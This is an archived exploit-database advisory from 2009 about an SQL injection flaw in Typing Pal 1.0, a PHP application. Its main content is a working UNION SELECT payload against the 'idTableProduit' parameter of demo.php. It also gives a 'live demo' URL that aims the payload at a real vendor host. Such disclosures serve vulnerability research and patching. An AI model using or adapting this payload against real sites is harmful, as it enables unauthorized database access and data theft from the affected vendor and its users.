Typing Pal 1.0 - 'idTableProduit' SQL Injection

EDB-ID:

9390




Platform:

PHP

Date:

2009-08-07


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                        

==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»] Typing Pal <= 1.0 Remote SQL injection Vulnerability
==============================================================================
    [»] my home:            [ Hackteach.org ]
    [»] Script:             [ Typing Pal ]
    [»] Language:           [ PHP ]
    [»] home:               [ http://www.demarque.qc.ca/download_demo/popupDownload.asp?noProduit=63&langue=1 ]
    [»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:          [ All member Hackteach.org/cc ]

###########################################################################



===[ Exploit SQL  ]===  
  
    [»] {PAHT}/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
    [»] l1v3 d3m0 : http://education.demarque.com/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
 

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-07]